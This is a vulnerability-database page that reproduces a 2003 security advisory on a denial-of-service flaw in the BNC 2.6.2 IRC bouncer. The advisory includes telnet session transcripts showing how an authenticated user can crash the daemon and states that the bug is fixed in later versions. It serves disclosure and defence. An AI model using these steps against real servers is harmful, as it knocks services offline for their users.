Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

bncDoS.txt

🗓️ 28 May 2003 00:00:00Reported by Angelo RosielloType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 22 Views

Denial of Service vulnerability in BNC version 2.6.2 as identified by Rosiello Security.

Code
` vulnerabilities  
  
------------------------------------------------------------------------  
  
2003-05-26  
  
BNC <= 2.6.2 DoS  
  
Rosiello Security & DTORS Security  
  
ADVISORY  
  
http://www.rosiello.org  
  
Denial of Service in bnc 2.6.2  
February, 2003  
  
I. BACKGROUND  
BNC which is a acro for BouNCe is a daemon designed to allow some people who  
do not have access to the net in general, but who do have access to another  
pc that can reach the net, the ability to BouNCe though this pc to IRC.  
BNC also satisfies as a host to allow users to Bounce through shells to IRC  
thus allowing for many features such as an interresting internet address  
commonly used for show or for benifits such as mild protection from commonly  
used attacks such as DoS by covering a users real IP with that IP of a  
machine more capable of handling these attacks.  
  
II. DESCRIPTION  
It is possible, for an user of the program, killing remotely the daemon, but  
not executing arbitrary code.  
  
III. ANALYSIS  
Exploitation can provide the exit() of the program as follows.  
Load two telnet sessions.  
  
FISRT SESSION:  
[[email protected]]$ telnet 127.0.0.1 32986  
Trying 127.0.0.1...  
Connected to 127.0.0.1.  
Escape character is '^]'.  
user first first first first  
nick boom ~  
NOTICE AUTH :You need to say /quote PASS  
PASS temp123  
NOTICE AUTH :Welcome to BNC v2.6.2, the irc proxy  
NOTICE AUTH :Level two, lets connect to something real now  
NOTICE AUTH :type /quote conn [server] to connect  
NOTICE AUTH :type /quote help for basic list of commands and usage  
  
SECOND SESSION:  
[[email protected]]$ telnet 127.0.0.1 32986  
Trying 127.0.0.1...  
Connected to 127.0.0.1.  
Escape character is '^]'.  
user second second second second  
nick boom  
NOTICE AUTH :You need to  
say /quote PASS  
PASS temp123  
NOTICE AUTH :Welcome to BNC v2.6.2, the irc proxy  
NOTICE AUTH :Level two, lets connect to something real now  
NOTICE AUTH :type /quote conn [server] to connect  
NOTICE AUTH :type /quote help for basic list of commands and usage  
quit  
Connection closed by foreign host.  
  
NOW close the first session too...  
quit..  
(gdb)Program exited with code 010.  
The password must be the right one! (the user must be real).  
The daemon will die.  
  
IV. DETECTION  
bnc2.6.2 is vulnerable, latest versions are not.  
The manteiner of the project was advised and He granted that the bug was  
fixed in the latest versions.  
  
VIII. CREDIT  
Angelo Rosiello  
http://www.rosiello.org  
http://www.dtors.net  
  
Software:  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
28 May 2003 00:00Current
7.4High risk
Vulners AI Score7.4
denial of servicebnc vulnerabilitiesrosiello securityirc proxyprogram exploitation.
22